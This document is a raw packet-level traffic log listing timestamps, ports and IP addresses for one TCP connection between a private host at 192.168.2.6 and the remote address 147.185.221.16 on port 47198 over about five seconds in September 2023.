Sep 19, 2023 21:07:46.412787914 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:46.412823915 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:46.454987049 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:46.455127954 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:46.768848896 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:46.769084930 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:46.770262957 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:46.770365953 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:46.808650017 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:46.808831930 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:47.123780012 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:47.123796940 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:47.123820066 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:47.123944044 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:47.123944998 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:47.166403055 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:47.166563034 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:47.535322905 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:47.535382032 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:47.535402060 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:47.535404921 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:47.535442114 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:47.535442114 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:47.535459995 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:47.535504103 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:47.537518024 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:47.537564039 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:47.570538044 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:47.570606947 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:47.888200045 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:47.888303041 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:47.888679028 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:47.888737917 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:47.889192104 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:47.889256001 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:47.923742056 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:47.923861980 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:48.241050959 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:48.241157055 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:48.241579056 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:48.241641998 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:48.241833925 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:48.241889954 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:48.242341995 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:48.242408037 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:48.242439985 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:48.242497921 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:48.276495934 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:48.276585102 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:48.320075035 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:48.320180893 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:48.596580982 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:48.596592903 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:48.596685886 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:48.597296000 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:48.597357988 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:48.598071098 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:48.598128080 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:48.598345995 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:48.598401070 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:48.601037025 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:48.601093054 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:48.601187944 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:48.601233959 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:48.630553961 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:48.630686998 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:48.674474955 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:48.674601078 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:48.949295044 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:48.949390888 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:48.949451923 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:48.949501038 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:48.949799061 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:48.949840069 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:48.949888945 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:48.949933052 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:48.950664997 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:48.950711966 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:48.951000929 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:48.951050043 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:48.953816891 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:48.953876972 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:48.953910112 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:48.953952074 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:48.987442970 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:48.987517118 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:49.029417038 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:49.029493093 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:49.302232981 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:49.302349091 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:49.302377939 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:49.302452087 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:49.302689075 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:49.302746058 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:49.302941084 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:49.303006887 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:49.303073883 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:49.303119898 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:49.303179026 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:49.303226948 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:49.304029942 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:49.304080009 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:49.304110050 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:49.304155111 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:49.306863070 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:49.306941986 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:49.341002941 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:49.341154099 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:49.381994009 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:49.382116079 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:49.382368088 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:49.382422924 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:49.657391071 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:49.657426119 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:49.657588959 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:49.657634020 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:49.660072088 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:49.660104036 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:49.660156965 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:49.660156965 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:49.660178900 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:49.694153070 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:49.694199085 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:49.694323063 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:49.694324970 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:49.735059023 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:49.735183001 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:49.791637897 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:49.791779995 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:50.010663986 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:50.010781050 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:50.010945082 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:50.010978937 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:50.011001110 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:50.011032104 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:50.011104107 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:50.011157036 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:50.011575937 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:50.011630058 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:50.011866093 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:50.011917114 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:50.012240887 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:50.012274981 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:50.012304068 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:50.012327909 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:50.012658119 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:50.012717009 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:50.013169050 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:50.013225079 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:50.013701916 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:50.013752937 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:50.047882080 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:50.048026085 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:50.091887951 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:50.092025042 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:50.149075985 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:50.149283886 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:50.451469898 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:50.451927900 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:50.451961994 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:50.452001095 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:50.452009916 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:50.452152014 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:50.457978010 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:50.458070993 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:50.504771948 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:50.504870892 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:50.805655956 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:50.805839062 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:50.806040049 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:50.806117058 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:50.806179047 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:50.806227922 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:50.806382895 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:50.806467056 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:50.807235003 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:50.807298899 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:50.807303905 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:50.807343960 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:50.807360888 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:50.807401896 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:50.807415009 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:50.807471991 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:50.807813883 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:50.807867050 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:50.807888985 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:50.807945967 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:50.807969093 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:50.808005095 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:50.808394909 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:50.808438063 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:50.808456898 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:50.808499098 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:50.808897018 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:50.808952093 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:50.809010983 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:50.809072018 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:50.809312105 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:50.809366941 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:50.809992075 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:50.810044050 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:50.811234951 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:50.811302900 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:50.858429909 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:50.858562946 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:51.158443928 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.158638000 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:51.158919096 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.158993959 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:51.159044981 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.159101963 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:51.159173965 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.159228086 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:51.159575939 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.159589052 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.159652948 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:51.159818888 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.159878016 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:51.160068989 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.160137892 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:51.160165071 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.160218954 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:51.160244942 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.160303116 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:51.160448074 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.160501957 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:51.160789013 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.160851002 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:51.161336899 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.161350012 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.161406040 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:51.161429882 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:51.161506891 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.161566973 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:51.161653996 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.161695004 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.161706924 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:51.161742926 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:51.162086964 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.162146091 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:51.162463903 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.162517071 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:51.162571907 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.162626028 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:51.162808895 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.162862062 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:51.162964106 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.163016081 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:51.163585901 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.163650990 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.163667917 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:51.163700104 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:51.164087057 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.164159060 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:51.164287090 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.164334059 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:51.164374113 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.164427042 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:51.164510012 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.164556026 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:51.212217093 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.212435961 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:51.213674068 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.213751078 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:51.513338089 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.513351917 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.513477087 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:51.513498068 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.513510942 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.513551950 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:51.513570070 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.513595104 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:51.513623953 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:51.513940096 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.513988018 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:51.514008045 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.514019966 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.514074087 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:51.514074087 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:51.514774084 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.514786959 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.514796972 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.514807940 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.514827967 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:51.514852047 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:51.514867067 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:51.515405893 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.515419006 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.515460968 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:51.515460968 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:51.515594959 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.515641928 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:51.515794992 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.515844107 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:51.515866995 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.515908003 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:51.516746044 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.516798973 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:51.516849041 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.516895056 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:51.517080069 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.517157078 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:51.517713070 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.517770052 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:51.518145084 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.518199921 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:51.518328905 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.518376112 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:51.518376112 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.518423080 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:51.518796921 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.518853903 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:51.519294977 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.519354105 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:51.519534111 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.519582033 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:51.519593000 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.519644022 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:51.519905090 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.519916058 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.519948959 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:51.519968987 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:51.520176888 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.520224094 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:51.520319939 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.520369053 CEST	49710	47198	192.168.2.6	147.185.221.16
